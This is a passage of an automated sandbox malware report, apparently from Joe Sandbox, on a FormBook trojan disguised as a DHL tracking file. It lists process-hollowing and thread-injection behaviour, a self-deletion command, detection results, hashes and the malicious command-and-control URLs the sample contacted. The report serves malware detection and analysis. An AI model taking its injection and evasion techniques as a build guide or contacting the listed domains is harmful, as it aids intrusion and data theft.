          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033D8DF1 mov eax, dword ptr fs:[00000030h]11_2_033D8DF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332B1E1 mov eax, dword ptr fs:[00000030h]11_2_0332B1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332B1E1 mov eax, dword ptr fs:[00000030h]11_2_0332B1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332B1E1 mov eax, dword ptr fs:[00000030h]11_2_0332B1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033B41E8 mov eax, dword ptr fs:[00000030h]11_2_033B41E8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333D5E0 mov eax, dword ptr fs:[00000030h]11_2_0333D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333D5E0 mov eax, dword ptr fs:[00000030h]11_2_0333D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033EFDE2 mov eax, dword ptr fs:[00000030h]11_2_033EFDE2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033EFDE2 mov eax, dword ptr fs:[00000030h]11_2_033EFDE2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033EFDE2 mov eax, dword ptr fs:[00000030h]11_2_033EFDE2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033EFDE2 mov eax, dword ptr fs:[00000030h]11_2_033EFDE2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A6DC9 mov eax, dword ptr fs:[00000030h]11_2_033A6DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A6DC9 mov eax, dword ptr fs:[00000030h]11_2_033A6DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A6DC9 mov eax, dword ptr fs:[00000030h]11_2_033A6DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A6DC9 mov ecx, dword ptr fs:[00000030h]11_2_033A6DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A6DC9 mov eax, dword ptr fs:[00000030h]11_2_033A6DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A6DC9 mov eax, dword ptr fs:[00000030h]11_2_033A6DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335002D mov eax, dword ptr fs:[00000030h]11_2_0335002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335002D mov eax, dword ptr fs:[00000030h]11_2_0335002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335002D mov eax, dword ptr fs:[00000030h]11_2_0335002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335002D mov eax, dword ptr fs:[00000030h]11_2_0335002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335002D mov eax, dword ptr fs:[00000030h]11_2_0335002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333B02A mov eax, dword ptr fs:[00000030h]11_2_0333B02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333B02A mov eax, dword ptr fs:[00000030h]11_2_0333B02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333B02A mov eax, dword ptr fs:[00000030h]11_2_0333B02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333B02A mov eax, dword ptr fs:[00000030h]11_2_0333B02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335BC2C mov eax, dword ptr fs:[00000030h]11_2_0335BC2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F4015 mov eax, dword ptr fs:[00000030h]11_2_033F4015
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F4015 mov eax, dword ptr fs:[00000030h]11_2_033F4015
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A7016 mov eax, dword ptr fs:[00000030h]11_2_033A7016
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A7016 mov eax, dword ptr fs:[00000030h]11_2_033A7016
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A7016 mov eax, dword ptr fs:[00000030h]11_2_033A7016
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A6C0A mov eax, dword ptr fs:[00000030h]11_2_033A6C0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A6C0A mov eax, dword ptr fs:[00000030h]11_2_033A6C0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A6C0A mov eax, dword ptr fs:[00000030h]11_2_033A6C0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A6C0A mov eax, dword ptr fs:[00000030h]11_2_033A6C0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F740D mov eax, dword ptr fs:[00000030h]11_2_033F740D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F740D mov eax, dword ptr fs:[00000030h]11_2_033F740D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F740D mov eax, dword ptr fs:[00000030h]11_2_033F740D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E1C06 mov eax, dword ptr fs:[00000030h]11_2_033E1C06
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0040ACF0 LdrLoadDll,1_2_0040ACF0

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: FA0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: unknown protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeMemory written: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 4636Jump to behavior
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeProcess created: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"Jump to behavior
          Source: explorer.exe, 00000004.00000000.400933847.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.372434615.00000000083EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.379442047.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.406682717.00000000083EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.366258257.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.391671803.00000000083EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.398942795.0000000000EE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.398387239.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.365948444.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.379442047.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.378992987.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.366258257.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.398942795.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.569698157.0000000005680000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.601472852.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.609013928.0000000005680000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.562272116.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.538860385.0000000005680000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.379442047.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.366258257.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.398942795.0000000000EE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000004.00000000.379442047.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.366258257.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.398942795.0000000000EE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000014.00000000.603455559.0000000004560000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.563664219.0000000004560000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanng
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405AA7

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts11
          Native API          		Path Interception512
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Query Registry          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
          Virtualization/Sandbox Evasion          		LSASS Memory231
          Security Software Discovery          		Remote Desktop Protocol1
          Clipboard Data          		Exfiltration Over Bluetooth1
          Non-Application Layer Protocol          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)512
          Process Injection          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
          Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Deobfuscate/Decode Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
          Obfuscated Files or Information          		LSA Secrets2
          File and Directory Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Software Packing          		Cached Domain Credentials13
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          File Deletion          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562043 Sample: DHL AWB TRACKING DETAILS.exe Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 33 www.chinaanalysisgroup.com 2->33 43 Multi AV Scanner detection for domain / URL 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 8 other signatures 2->49 11 DHL AWB TRACKING DETAILS.exe 19 2->11         started        15 explorer.exe 10 2->15         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\vzhghptrhu.dll, PE32 11->31 dropped 59 Injects a PE file into a foreign processes 11->59 17 DHL AWB TRACKING DETAILS.exe 11->17         started        signatures6 process7 signatures8 35 Modifies the context of a thread in another process (thread injection) 17->35 37 Maps a DLL or memory area into another process 17->37 39 Sample uses process hollowing technique 17->39 41 Queues an APC in another process (thread injection) 17->41 20 explorer.exe 17->20 injected process9 process10 22 wlanext.exe 20->22         started        signatures11 51 Self deletion via cmd delete 22->51 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        27 explorer.exe 2 153 22->27         started        process12 process13 29 conhost.exe 25->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DHL AWB TRACKING DETAILS.exe43%VirustotalBrowse
          DHL AWB TRACKING DETAILS.exe9%MetadefenderBrowse
          DHL AWB TRACKING DETAILS.exe49%ReversingLabsWin32.Trojan.FormBook
          DHL AWB TRACKING DETAILS.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll37%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll26%ReversingLabsWin32.Trojan.InjectorX

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          31.2.explorer.exe.f07f840.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          20.0.explorer.exe.ad0f840.6.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.2.wlanext.exe.382f840.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          11.2.wlanext.exe.deef30.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          20.0.explorer.exe.ad0f840.3.unpack100%AviraTR/Patched.Ren.GenDownload File
          20.0.explorer.exe.ad0f840.0.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.hdetpnipa.xyz/a34b/10%VirustotalBrowse
          www.hdetpnipa.xyz/a34b/100%Avira URL Cloudphishing
          http://crl.v0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.chinaanalysisgroup.com
          		94.136.40.51
          		truefalse
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            www.hdetpnipa.xyz/a34b/true
            • 10%, Virustotal, Browse
            • Avira URL Cloud: phishing
            		low

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.379142678.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.366064196.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.398584347.000000000095C000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://nsis.sf.net/NSIS_ErrorDHL AWB TRACKING DETAILS.exe, DHL AWB TRACKING DETAILS.exe, 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp, DHL AWB TRACKING DETAILS.exe, 00000000.00000000.352121005.0000000000409000.00000008.00000001.01000000.00000003.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000000.355752258.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                		high
                http://nsis.sf.net/NSIS_ErrorErrorDHL AWB TRACKING DETAILS.exe, 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp, DHL AWB TRACKING DETAILS.exe, 00000000.00000000.352121005.0000000000409000.00000008.00000001.01000000.00000003.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000000.355752258.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                  		high
                  http://crl.vexplorer.exe, 00000014.00000003.556038613.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.553294057.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.566295637.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.578401411.0000000004F3A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  No contacted IP infos

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:562043
                  Start date:28.01.2022
                  Start time:10:53:30
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 11m 57s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:DHL AWB TRACKING DETAILS.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:32
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@9/4@1/0
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 60.3% (good quality ratio 55.5%)
                  • Quality average: 73.6%
                  • Quality standard deviation: 30.6%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 98
                  • Number of non-executed functions: 63
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchUI.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, svchost.exe, mobsync.exe, wuapihost.exe
                  • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtEnumerateValueKey calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  10:55:45API Interceptor145x Sleep call for process: explorer.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\2mew1mahf21

                  Download File
                  Process:C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):216745
                  Entropy (8bit):7.992452492387805
                  Encrypted:true
                  SSDEEP:6144:i7Bqt/rlMOOtvd7vIeYMD0dNT+V/w1Vc5S:Oqt/rlMOURXYMAdl+VI1wS
                  MD5:D711B91073A1EF5C228C8C73240F3385
                  SHA1:E032D0778986830C322964AEBFB8E870BC7F2ADC
                  SHA-256:A445B0B8F8A9D002C4196DB12F455ACBA30FDF9A59679227B414E478450C8620
